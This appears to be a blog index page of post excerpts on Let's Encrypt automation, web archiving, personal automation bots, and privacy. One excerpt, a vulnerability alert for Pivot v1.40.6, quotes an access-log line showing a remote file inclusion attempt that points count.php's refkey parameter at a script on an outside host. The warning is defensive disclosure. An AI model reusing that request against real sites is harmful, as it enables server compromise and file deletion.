Automating deployment of Let's Encrypt certificates.

A couple of weeks back, somebody I know asked me how I went about deploying SSL certificates from the Let's Encrypt project across all of my stuff.  Without going into too much detail about what SSL and TLS are (but here's a good introduction to them), the Let's Encrypt project will issue SSL certificates to anyone who wants one, provided that they can prove somehow that they control what they're cutting a certificate for.  You can't use Let's Encrypt to generate a certificate for google.com because they'd try to communicate with the server (there isn't any such thing but …

Read more...

Saving stuff before it vanishes down the memory hole.

UPDATE - 20170302 - Added Firefox plugin for the Internet Archive.

UPDATE - 20170205 - Added Chrome plugin for the Internet Archive.

Note: This article is aimed at people all across the spectrum of levels of experience with computers.  You might see a lot of stuff you already know; then again, you might learn one or two things that hadn't showed up on your radar yet.  Be patient.

In George Orwell's novel 1984, one of his plot points of the story was something called the Memory Hole. They were slots all over the building in which Winston Smith worked, into which documents which the …

Read more...

Exocortex: Halo

In my last post on the topic of exocortices I discussed the Huginn project, how it works, what the code for the agents actually look like, and some of the stuff I use Huginn's agent networks for for in my everyday life. In short, I call it my exocortex - an extension of the information processing capabilities of my brain running in silico instead of in vivo. Now I'm going to talk about Exocortex Halo, a separate suite of bots which augment Huginn to carry out tasks that Huginn by itself isn't designed to carry out very easily, and thus extend …

Read more...

HTTP Log Messenger v1.0

One of the problems hacktivists ran into when trying to disseminate useful information to people in Syria and Egypt was how to get through to people when DNS and web access are being filtered or outright blocked. Putting up web pages containing phone numbers of ISPs volunteering dialup access was something of a crapshoot because there was no guarantee that people would be able to view them. Someone (I don't remember whom) hit on the idea of contacting sysadmins in the Middle East by leaving messages in the access and error logs of their web servers. This works but pumping …

Read more...

Getting set back up after the move.

Things have been a bit dodgy over the past couple of days. I haven't written much because of stuff going on at home. Somehow, Leandra's systemware got horked along the way (I'm pretty sure that I messed up an upgrade somewhere along the line and it cascaded out of control) and I spent most of the weekend trying to fix it. While I think that I made some progress getting things put back together there is no guarantee that things aren't going to go seriously pear-shaped in the near future. Plus, I really don't have the bandwidth at home anymore …

Read more...

Information exposure in Google Buzz.

Regular users of Gmail have no doubt noticed the new entry just below their Inbox tag called Buzz - if you haven't yet, chances are you will soon. From what I can tell it seems to work a lot like Twitter and Facebook status updates do: there's just enough room to post two or three sentences, links to other pages, comments on Buzz posts, and other stuff like that. It also hooks links to other sides listed in your Google Profile (if you've set one up) so that if you update one of them, it automatically posts a link in your …

Read more...

Conversation with a Facebook insider.

It seems as if Facebook is everywhere these days. Less involved than Livejournal or Blogger but packing a little more substance than Twitter, Facebook is a great way to goof off when you find yourself with a couple of minutes to spare. Games, quizzes, applications, and toys abound on the service, and it also makes it easy to stalk people you used to go to school with. It also made it easier to hose your social life without having to resort to off color jokes in front of the boss' wife. Their privacy settings (and ambiguity thereof) were infamously poor …

Read more...

Remotely exploitable vulnerability found in Pivot v1.40.6!

Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. This vulnerability can be used by an attacker to delete files from your web content directory, and if the register_globals PHP variable is set, it can be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:

a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1 …

Read more...

New project for RPM-based distros: YUM Web GUI

(ObDisclaimer: I work for these guys.)

Developers at The Prometheus Group recently announced a new open source project on their forums, a web-based interface for YUM that will make it easy to add, remove, and update packages on servers running Redhat-like distributions of Linux. The GUI will be implemented in PHP and Python, and will make use of the RPM modules already present in Fedora Core, Redhat, and like distros. To make it more attractive to sysadmins (who usually have too much to do and too little time to do it all) the web interface is designed to integrate with …

Read more...